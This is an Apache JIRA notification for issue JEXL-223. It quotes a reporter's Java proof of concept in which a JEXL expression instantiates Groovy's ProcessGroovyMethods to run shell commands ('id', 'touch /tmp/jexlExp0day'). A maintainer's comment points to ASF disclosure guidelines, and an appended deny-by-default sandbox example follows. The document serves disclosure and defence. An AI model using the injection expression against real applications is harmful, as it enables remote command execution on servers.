[jira] [Commented] (JEXL-223) Apache Commons JEXL Expression Execute Command Vulnerability



JIRA jira@apache.org

    [ https://issues.apache.org/jira/browse/JEXL-223?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=15978236#comment-15978236 ]

Bruno P. Kinoshita commented on JEXL-223:
-----------------------------------------

Edited to add code format.

Also, see http://www.apache.org/security/. For Security/Vulnerabilities issues, it is better to follow the guidelines provided by the ASF Security Team when disclosing issues like this.

> Apache Commons JEXL Expression Execute Command Vulnerability
> ------------------------------------------------------------
>
>                 Key: JEXL-223
>                 URL: https://issues.apache.org/jira/browse/JEXL-223
>             Project: Commons JEXL
>          Issue Type: Bug
>            Reporter: cnbird
>            Priority: Critical
>
> 0x01 Summary
> Apache Commons JEXL Expression Execute Command Vulnerability through Groovy.
> 0x02 POC
> {code}
> import java.io.IOException;
> import org.apache.commons.jexl3.JexlBuilder;
> import org.apache.commons.jexl3.JexlContext;
> import org.apache.commons.jexl3.JexlEngine;
> import org.apache.commons.jexl3.JexlExpression;
> import org.apache.commons.jexl3.MapContext;
> import org.codehaus.groovy.runtime.ProcessGroovyMethods;
> 
> public class elExp {
>     public static void main(String[] args) throws IOException {
>         // Create or retrieve an engine
>         JexlEngine jexl = new JexlBuilder().create();
> 
>         // Create an expression
>         //String jexlExp = "new(\"java.lang.String\", \"hello world\")";
> 
>         // Groovy's ProcessGroovyMethods.execute(String) is a static helper that runs a command;
>         // called here directly from Java to show it is on the classpath
>         System.out.println(ProcessGroovyMethods.execute("id").toString());
> 
>         // The same class instantiated and invoked from inside a JEXL expression via new(...)
>         String jexlExp = "new(\"org.codehaus.groovy.runtime.ProcessGroovyMethods\").execute(\"touch /tmp/jexlExp0day\")";
>         JexlExpression e = jexl.createExpression(jexlExp);
> 
>         try {
>             Process process = new ProcessBuilder("id").start();
>         } catch (IOException e1) {
>             e1.printStackTrace();
>         }
> 
>         // Create a context and add data
>         JexlContext jc = new MapContext();
>         jc.set("foo", jexlExp);
> 
>         // Now evaluate the expression, getting the result
>         Object o = e.evaluate(jc);
>         System.out.println(o);
>     }
> }
> {code}



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)
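As an added mitigation example, not part of the original issue or of the JEXL project's own code: a deny-by-default JexlSandbox that leaves the class named in the report above, and every other class not explicitly listed, unreachable from an expression. It assumes the JEXL 3.1-era JexlSandbox API (white/black, renamed allow/block in later releases) and a strict engine, so a denied constructor surfaces as a JexlException rather than a silent null.

```java
import org.apache.commons.jexl3.JexlBuilder;
import org.apache.commons.jexl3.JexlContext;
import org.apache.commons.jexl3.JexlEngine;
import org.apache.commons.jexl3.JexlException;
import org.apache.commons.jexl3.MapContext;
import org.apache.commons.jexl3.introspection.JexlSandbox;

public class SandboxedJexl {

    // "Black" sandbox (constructor argument false): a class with no explicit entry
    // gets no read/write/execute permission, so new(...) on it and method calls on
    // it cannot be resolved by the engine's introspector.
    static JexlEngine buildEngine() {
        JexlSandbox sandbox = new JexlSandbox(false);
        // Whitelist only the classes the application's expressions legitimately need.
        sandbox.white("java.lang.String");
        sandbox.white("java.lang.Integer");
        // strict(true): an unresolvable constructor or method throws instead of
        // yielding null, which makes the denial visible and easy to log.
        return new JexlBuilder().sandbox(sandbox).strict(true).create();
    }

    // Evaluates expression text from an untrusted source; returns the result,
    // or a "rejected: ..." marker when the sandbox blocks it.
    static Object evaluateUntrusted(JexlEngine jexl, String expr) {
        JexlContext ctx = new MapContext();
        try {
            return jexl.createExpression(expr).evaluate(ctx);
        } catch (JexlException ex) {
            // Worth logging: a denied class or method in user input is a signal.
            return "rejected: " + ex.getMessage();
        }
    }

    public static void main(String[] args) {
        JexlEngine jexl = buildEngine();
        // Allowed: java.lang.String is whitelisted, constructor and methods alike.
        System.out.println(evaluateUntrusted(jexl,
                "new(\"java.lang.String\", \"hello world\").toUpperCase()"));
        // Denied: the class from the report has no sandbox entry, so new() fails.
        System.out.println(evaluateUntrusted(jexl,
                "new(\"org.codehaus.groovy.runtime.ProcessGroovyMethods\")"));
    }
}
```

A deny-by-default sandbox narrows what an expression can reach, but it is one layer: where the design allows it, also keep expression text from untrusted sources out of the engine entirely.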